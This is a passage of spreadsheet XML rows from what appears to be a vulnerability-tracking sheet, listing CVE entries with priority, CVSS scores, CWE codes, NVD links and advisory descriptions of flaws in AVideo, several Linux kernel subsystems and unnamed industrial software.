      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89252</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr"/>
      <c r="Q563" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to verify ownership in addLiveLink.php when updating LiveLinks, allowing authenticated users to modify other users' links. A canStream user can overwrite another user's LiveLink HLS source and metadata by supplying an existing linkId, redirecting viewers to attacker-controlled media.</t>
        </is>
      </c>
      <c r="S563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89252</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89443</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr"/>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: ISST: Validate level in perf mask ioctls
isst_if_get_perf_level_mask() and isst_if_get_base_freq_mask() use the
user-provided level as an index into perf_levels[] via
_read_pp_level_info() and _read_bf_level_info(), but neither helper
validates it first.
The adjacent level-info helpers reject levels above max_level before
reading the same per-level register block. Add the same bounds checks to
the mask helpers, and reject disabled SST-PP levels in
isst_if_get_perf_level_mask() to match isst_if_get_perf_level_info().
This prevents out-of-bounds reads from the per-level offset table on
invalid ioctl input.</t>
        </is>
      </c>
      <c r="S564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89443</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89571</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr"/>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: bound fwctl command payload to the input buffer
fwctl_cmd_rpc() copies cmd-&gt;in_len bytes into inbuf = kvzalloc(cmd-&gt;in_len)
and passes inbuf and in_len to -&gt;fw_rpc(). The CXL callback cxlctl_fw_rpc()
ignores in_len and never checks the user-controlled op_size against it.
cxlctl_set_feature() bounds op_size only from below
(op_size &lt;= sizeof(feat_in-&gt;hdr)) and then reads op_size - sizeof(hdr)
bytes from feat_in-&gt;feat_data via cxl_set_feature(). With a small in_len
and a large op_size the first memcpy() already reads past the
kvzalloc(in_len) buffer; the out-of-bounds bytes are placed in the mailbox
payload and sent to the device, and a large enough op_size can walk into
unmapped memory and oops the kernel. The Get paths pin op_size to a fixed
size but likewise read the input struct without checking in_len.
Reject, at the single dispatch point, any request whose fixed header plus
op_size does not fit in the copied-in buffer. The lower-bound test guards
the subtraction and ensures op_size was copied in before it is read.</t>
        </is>
      </c>
      <c r="S565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89571</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89593</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr"/>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hugetlb: only adjust reservation during unmapping if mapcount is 0
Since df7a6d1f6405, __unmap_hugepage_range can adjust reservations.  In
the case of folio mapped in both a parent and a child, if the parent
unmaps the range first, the reservation adjustment will result in an
underflow of the reserved count.  Once the child unmaps the range, the
count is restored.  Change __unmap_hugepage_range() to check the mapcount
before adjusting the reservation.</t>
        </is>
      </c>
      <c r="S566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89593</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89596</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr"/>
      <c r="Q567" s="5" t="inlineStr"/>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
forcedeth: fix off-by-one when saving/restoring non-PCI config space
nv_suspend() and nv_resume() walk the non-PCI configuration space with
	for (i = 0; i &lt;= np-&gt;register_size/sizeof(u32); i++)
which runs one iteration too many. saved_config_space is declared as
	u32 saved_config_space[NV_PCI_REGSZ_MAX/4];
and NV_PCI_REGSZ_VER3 is equal to NV_PCI_REGSZ_MAX (0x604), so on a VER3
device register_size/sizeof(u32) is exactly the array length and the last
iteration addresses one element past the end.
The element it lands on is np-&gt;name_rx[0..3]: saved_config_space[] is
followed immediately by char name_rx[IFNAMSIZ + 3], and char needs no
padding. Nothing observable is corrupted by that, because nv_request_irq()
rewrites name_rx with sprintf() before it is ever passed to request_irq().
The bug is the out-of-bounds access itself, which UBSAN reports and which
CONFIG_UBSAN_TRAP=y turns into a trap that aborts the running kernel code,
plus an MMIO read and, on resume, an MMIO writel() to base + 0x604, one
dword past the range the driver mapped:
	np-&gt;base = ioremap(addr, np-&gt;register_size);
VER1 and VER2 devices stay inside the array, but they too get the stray
read and the stray write one dword past their own window.
Caught by UBSAN on an Apple Macmini3,1 (MCP79) during a deep S3 cycle.
The splat below is trimmed: the build path in the file name, the CPU
and taint lines, the Workqueue line, the "?" hint frames, and the
frames below device_suspend are all cut. The kernel was tainted, with
an out-of-tree nouveau and CPU_OUT_OF_SPEC; forcedeth itself was the
stock module.
  UBSAN: array-index-out-of-bounds in drivers/net/ethernet/nvidia/forcedeth.c:6225:25
  index 385 is out of range for type 'u32 [385]'
  Call Trace:
   dump_stack_lvl+0x5d/0x80
   ubsan_epilogue+0x5/0x2b
   __ubsan_handle_out_of_bounds.cold+0x54/0x59
   __this_module+0xe398c/0xe9010 [forcedeth]
   pci_pm_suspend+0x80/0x170
   dpm_run_callback+0x51/0x160
   device_suspend+0x1a2/0x4a0
   ...
Both loops are hit. UBSAN reports each source location only once per module
load (__ubsan_handle_out_of_bounds() calls suppress_report(), which does
test_and_set_bit(REPORTED_BIT, ...) on the struct source_location), so the
two splats land in the first S3 cycle after the module is loaded and later
cycles are silent even though the access still runs off the end every time.
In that first cycle line 6225 is reported from pci_pm_suspend and line 6240
from pci_pm_resume.
The same off-by-one was fixed in nv_get_regs() by commit ba9aa134287f
("forcedeth: fix buffer overflow") in 2012; these two loops were missed.
The suspend and resume side was reported on LKML in September 2013 by Marc
Weber, with the same analysis and the same one-character fix, but the patch
was attached rather than sent inline and the thread ended there.
Use &lt; instead of &lt;=, which saves and restores exactly register_size bytes.</t>
        </is>
      </c>
      <c r="S567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89596</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89608</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr"/>
      <c r="Q568" s="5" t="inlineStr"/>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: pass packet set buffer size to parser
ecryptfs_parse_packet_set() receives a pointer into the file header, but
it calculates the remaining packet buffer size from PAGE_SIZE - 8.  For
version 1 headers the packet set starts later in the header, so this can
overstate the available buffer.
Pass the actual packet set buffer length from the caller and calculate
per-packet limits from the remaining bytes in that buffer.  Recompute the
remaining length after consuming a tag 3 packet before parsing the
following tag 11 packet.</t>
        </is>
      </c>
      <c r="S568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89608</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89639</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr"/>
      <c r="Q569" s="5" t="inlineStr"/>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cifs: use cifs_invalidate_cache() in cifs_do_truncate() for O_TRUNC
cifs_do_truncate() is invoked from cifs_open() without i_rwsem, so it
cannot use cifs_resize_file_locked() to perform a proper fscache cookie
resize.  Instead, add cifs_invalidate_cache() after cifs_setsize().
cifs_invalidate_cache() calls fscache_invalidate(), which works without
holding i_rwsem: it unconditionally increments inval_counter and sets
FSCACHE_COOKIE_NO_DATA_TO_READ, ensuring that stale cached data is not
served once the cookie is later activated by fscache_use_cookie().
Truncation to zero leaves no valid cached data, making invalidation the
correct semantic here.</t>
        </is>
      </c>
      <c r="S569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89639</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89640</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr"/>
      <c r="Q570" s="5" t="inlineStr"/>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cifs: fix loff_t underflow in cifs_remap_file_range() when len == 0
With len == 0 (clone to EOF), the effective length is computed as:
    len = src_inode-&gt;i_size - off;
If off &gt; i_size, this is a negative loff_t, corrupting the ByteCount
in the FSCTL_DUPLICATE_EXTENTS_TO_FILE request and inverting the range
in filemap_write_and_wait_range().  The existing off &gt;= i_size check
fires only after the ioctl has already been sent.
Snapshot i_size_read() once for both the bounds check and the length
calculation, eliminating the TOCTOU and 32-bit torn-read risk.  Reject
off &gt; src_size with -EINVAL.  Treat off == src_size as a no-op,
consistent with __generic_remap_file_range_prep().</t>
        </is>
      </c>
      <c r="S570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89640</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89691</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr"/>
      <c r="Q571" s="5" t="inlineStr"/>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: clear opcnt on compound arg release to prevent OOB read
nfsd4_release_compoundargs() resets args-&gt;ops to the inline iops[8]
array when the dynamically-allocated ops buffer is freed, but leaves
args-&gt;opcnt at its original value (which can be up to 200 for NFSv4.1+
compounds).
If rq_status_counter is stuck at an odd value (which can happen when
nfsd_dispatch() hits an error path after setting it odd), the RPC
status dumpit handler reads min(opcnt, 16) entries from args-&gt;ops[].
Since iops only has 8 elements and is the last field in struct
nfsd4_compoundargs, reading indices 8-15 accesses adjacent slab memory
and leaks it to userspace via netlink.
Zero opcnt unconditionally in nfsd4_release_compoundargs() so stale
compound metadata is never exposed through the status interface.
[ cel: Remove the kvfree_rcu_mightsleep() sleep from the exposure window ]</t>
        </is>
      </c>
      <c r="S571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89691</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89705</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr"/>
      <c r="Q572" s="5" t="inlineStr"/>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: restore rq_status_counter to even on all nfsd_dispatch() exit paths
nfsd_dispatch() sets rq_status_counter to an odd value once a request has
been decoded, and back to an even value once it has been fully processed,
forming a seq-lock like protocol with the lockless reader in
nfsd_nl_rpc_status_get_dumpit().
Only the fully successful path restored the counter to even. The cache-hit
(RC_REPLY), drop (RC_DROPIT / RQ_DROPME) and encode-error paths all return
after the odd-valued store without ever bringing the counter back to even.
Once one of those paths is taken, rq_status_counter is left odd: the next
request's decode ORs in 1 (still odd) and only a subsequent successful
encode restores even. While stuck odd, the dumpit reader treats the rqstp
fields as stable and its retry check compares against the same unchanging
odd value, so it never detects concurrent mutation. This exposes actively
mutating fields (e.g. args-&gt;ops / args-&gt;opcnt during compound decode and
release) to the lockless reader, which can read past the end of the
8-element inline ops array.
Add a helper that advances the counter to the next even value and call it
on every return path that follows the odd-valued store. The decode-error
path is left untouched as it is reached before the counter is set odd.</t>
        </is>
      </c>
      <c r="S572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89705</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89731</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr"/>
      <c r="Q573" s="5" t="inlineStr"/>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/ras: Fix cxl_rch_get_aer_info() out-of-bounds AER register read
cxl_rch_get_aer_info() copies the RCH Downstream Port AER capability from
the RCRB MMIO block using a readl() loop bounded by sizeof(struct
aer_capability_regs). This struct is a software layout and its embedded
struct pcie_tlp_log is larger than the on-wire AER capability. As a
result the loop reads past the mapped AER register block.
The over-read also populates the software-only tail fields including
header_log.header_len. An out-of-range header_len passed to
pcie_print_tlp_log() can then loop past the header log buffer and cause
a second out-of-bounds read.
The read was correct when introduced, but struct pcie_tlp_log has since
grown (Header Log and TLP Prefix Log sizes, header_len and flit fields),
so sizeof(struct aer_capability_regs) no longer matches the physical AER
capability.
Bound the read to the physical AER registers, header through the 16 byte
Header Log. Zero the destination first so the software-only fields are
deterministic.</t>
        </is>
      </c>
      <c r="S573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89731</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90445</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr"/>
      <c r="Q574" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>An interface that accepts file uploads from authenticated users extracts the contents of uploaded archives without validating that extracted file paths remain within the intended destination directory. This allows an authenticated attacker to craft an archive whose entries traverse outside the destination directory, causing the extraction process to write files to arbitrary locations with the privileges of that process. This could allow an attacker to inject fabricated records into the system's stored data or tamper with application configuration.</t>
        </is>
      </c>
      <c r="S574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90445</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90447</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr"/>
      <c r="Q575" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>A routing rule selects between two different authentication mechanisms for the same downstream service based on the value of a client-supplied request header, rather than on any property the client cannot control. An authenticated user in possession of a shared service credential can set this header to route around the primary role-based authorization check and reach the alternate path's fixed, elevated role instead. This allows a low-privileged authenticated attacker who knows the shared credential to perform actions reserved for a higher-privileged role.</t>
        </is>
      </c>
      <c r="S575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90447</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90448</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr"/>
      <c r="Q576" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
